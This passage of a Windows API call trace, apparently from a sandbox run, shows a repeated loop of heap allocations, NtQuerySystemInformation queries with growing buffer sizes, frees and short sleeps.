Size=0x60) returned 0x285aa88 [0291.170] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa88, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa88, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0291.170] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa88 | out: hHeap=0x2560000) returned 1 [0291.170] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb98 [0291.170] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb98, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb98, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0291.171] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb98 | out: hHeap=0x2560000) returned 1 [0291.171] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d008 [0291.171] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d008, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d008, ResultLength=0x19ee88*=0xc0) returned 0x0 [0291.171] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d008 | out: hHeap=0x2560000) returned 1 [0291.171] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0291.172] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0291.172] Sleep (dwMilliseconds=0x110) [0291.188] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d520 [0291.188] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d520, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d520, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0291.188] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d520 | out: hHeap=0x2560000) returned 1 [0291.189] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a950 [0291.189] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a950, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a950, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0291.189] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a950 | out: hHeap=0x2560000) returned 1 [0291.189] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b808 [0291.189] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b808, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b808, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0291.190] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b808 | out: hHeap=0x2560000) returned 1 [0291.190] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cf40 [0291.190] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cf40, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cf40, ResultLength=0x19ee88*=0xc0) returned 0x0 [0291.191] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cf40 | out: hHeap=0x2560000) returned 1 [0291.191] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0291.191] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0291.191] Sleep (dwMilliseconds=0x110) [0291.203] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0291.203] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0291.204] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0291.204] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285abc0 [0291.204] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285abc0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285abc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0291.205] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285abc0 | out: hHeap=0x2560000) returned 1 [0291.205] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c3e8 [0291.205] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c3e8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c3e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0291.206] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c3e8 | out: hHeap=0x2560000) returned 1 [0291.206] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d3f0 [0291.206] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d3f0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d3f0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0291.206] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d3f0 | out: hHeap=0x2560000) returned 1 [0291.206] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0291.207] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0291.207] Sleep (dwMilliseconds=0x110) [0291.217] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d558 [0291.217] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d558, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d558, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0291.218] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d558 | out: hHeap=0x2560000) returned 1 [0291.219] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a7b0 [0291.219] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a7b0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a7b0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0291.220] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a7b0 | out: hHeap=0x2560000) returned 1 [0291.220] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bdf8 [0291.220] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bdf8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bdf8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0291.221] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bdf8 | out: hHeap=0x2560000) returned 1 [0291.221] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c5e0 [0291.221] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c5e0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c5e0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0291.221] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c5e0 | out: hHeap=0x2560000) returned 1 [0291.225] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0291.226] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0291.226] Sleep (dwMilliseconds=0x110) [0291.233] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d750 [0291.233] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d750, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d750, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0291.234] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d750 | out: hHeap=0x2560000) returned 1 [0291.234] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ab58 [0291.234] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ab58, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ab58, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0291.234] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ab58 | out: hHeap=0x2560000) returned 1 [0291.234] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c3e8 [0291.234] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c3e8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c3e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0291.235] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c3e8 | out: hHeap=0x2560000) returned 1 [0291.235] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cb58 [0291.235] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cb58, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cb58, ResultLength=0x19ee88*=0xc0) returned 0x0 [0291.235] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cb58 | out: hHeap=0x2560000) returned 1 [0291.235] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0291.236] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0291.236] Sleep (dwMilliseconds=0x110) [0291.247] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d638 [0291.247] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d638, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d638, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0291.248] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d638 | out: hHeap=0x2560000) returned 1 [0291.248] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa88 [0291.248] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa88, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa88, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0291.249] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa88 | out: hHeap=0x2560000) returned 1 [0291.249] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bcc8 [0291.249] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bcc8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bcc8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0291.249] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bcc8 | out: hHeap=0x2560000) returned 1 [0291.249] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c770 [0291.250] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c770, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c770, ResultLength=0x19ee88*=0xc0) returned 0x0 [0291.250] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c770 | out: hHeap=0x2560000) returned 1 [0291.250] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0291.251] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0291.251] Sleep (dwMilliseconds=0x110) [0291.263] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d558 [0291.264] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d558, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d558, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0291.264] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d558 | out: hHeap=0x2560000) returned 1 [0291.264] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a4d8 [0291.264] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a4d8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a4d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0291.265] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a4d8 | out: hHeap=0x2560000) returned 1 [0291.265] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bcc8 [0291.265] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bcc8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bcc8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0291.265] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bcc8 | out: hHeap=0x2560000) returned 1 [0291.265] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ca90 [0291.265] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ca90, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ca90, ResultLength=0x19ee88*=0xc0) returned 0x0 [0291.266] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ca90 | out: hHeap=0x2560000) returned 1 [0291.266] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0291.266] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0291.266] Sleep (dwMilliseconds=0x110) [0291.280] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d600 [0291.280] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d600, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d600, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0291.281] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d600 | out: hHeap=0x2560000) returned 1 [0291.281] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0291.281] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0291.281] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0291.281] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b6d8 [0291.281] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b6d8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b6d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0291.282] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b6d8 | out: hHeap=0x2560000) returned 1 [0291.282] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ca90 [0291.282] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ca90, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ca90, ResultLength=0x19ee88*=0xc0) returned 0x0 [0291.282] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ca90 | out: hHeap=0x2560000) returned 1 [0291.282] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0291.283] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0291.283] Sleep (dwMilliseconds=0x110) [0291.295] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d520 [0291.295] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d520, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d520, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0291.296] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d520 | out: hHeap=0x2560000) returned 1 [0291.296] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a950 [0291.296] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a950, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a950, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0291.296] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a950 | out: hHeap=0x2560000) returned 1 [0291.296] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b6d8 [0291.297] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b6d8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b6d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0291.297] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b6d8 | out: hHeap=0x2560000) returned 1 [0291.297] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cf40 [0291.297] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cf40, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cf40, ResultLength=0x19ee88*=0xc0) returned 0x0 [0291.298] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cf40 | out: hHeap=0x2560000) returned 1 [0291.298] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0291.298] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0291.298] Sleep (dwMilliseconds=0x110) [0291.311] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d5c8 [0291.311] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d5c8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d5c8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0291.312] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d5c8 | out: hHeap=0x2560000) returned 1 [0291.312] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0291.312] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0291.312] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0291.312] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bdf8 [0291.312] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bdf8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bdf8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0291.313] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bdf8 | out: hHeap=0x2560000) returned 1 [0291.313] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c838 [0291.313] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c838, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c838, ResultLength=0x19ee88*=0xc0) returned 0x0 [0291.313] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c838 | out: hHeap=0x2560000) returned 1 [0291.313] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0291.314] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0291.314] Sleep (dwMilliseconds=0x110) [0291.331] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6e0 [0291.332] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6e0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0291.332] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6e0 | out: hHeap=0x2560000) returned 1 [0291.332] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a4d8 [0291.333] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a4d8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a4d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0291.333] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a4d8 | out: hHeap=0x2560000) returned 1 [0291.333] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b5a8 [0291.333] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b5a8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0291.334] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b5a8 | out: hHeap=0x2560000) returned 1 [0291.334] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ce78 [0291.334] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ce78, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ce78, ResultLength=0x19ee88*=0xc0) returned 0x0 [0291.335] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ce78 | out: hHeap=0x2560000) returned 1 [0291.335] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0291.335] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0291.336] Sleep (dwMilliseconds=0x110) [0291.467] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d718 [0291.467] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d718, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d718, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0291.467] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d718 | out: hHeap=0x2560000) returned 1 [0291.467] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a8e8 [0291.467] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a8e8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a8e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0291.468] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a8e8 | out: hHeap=0x2560000) returned 1 [0291.468] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bf28 [0291.468] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bf28, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bf28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0291.468] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bf28 | out: hHeap=0x2560000) returned 1 [0291.469] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c770 [0291.469] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c770, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c770, ResultLength=0x19ee88*=0xc0) returned 0x0 [0291.469] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c770 | out: hHeap=0x2560000) returned 1 [0291.591] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0291.591] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0291.685] Sleep (dwMilliseconds=0x110) [0291.798] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d670 [0291.798] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d670, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d670, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0291.798] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d670 | out: hHeap=0x2560000) returned 1 [0291.798] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a5a8 [0291.798] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a5a8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0291.799] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a5a8 | out: hHeap=0x2560000) returned 1 [0291.799] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bcc8 [0291.799] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bcc8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bcc8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0291.799] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bcc8 | out: hHeap=0x2560000) returned 1 [0291.799] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c9c8 [0291.799] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c9c8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c9c8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0291.800] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c9c8 | out: hHeap=0x2560000) returned 1 [0291.800] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0291.800] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0291.800] Sleep (dwMilliseconds=0x110) [0291.891] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d830 [0291.891] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d830, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d830, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0291.892] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d830 | out: hHeap=0x2560000) returned 1 [0291.892] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a610 [0291.892] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a610, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a610, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0291.892] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a610 | out: hHeap=0x2560000) returned 1 [0291.892] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb00 [0291.892] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb00, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb00, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0291.893] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb00 | out: hHeap=0x2560000) returned 1 [0291.893] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c900 [0291.893] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c900, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c900, ResultLength=0x19ee88*=0xc0) returned 0x0 [0291.894] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c900 | out: hHeap=0x2560000) returned 1 [0291.894] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0291.895] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0291.895] Sleep (dwMilliseconds=0x110) [0291.904] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d8a0 [0291.904] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d8a0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d8a0, ResultLength=0x19ee88*=0xc0) 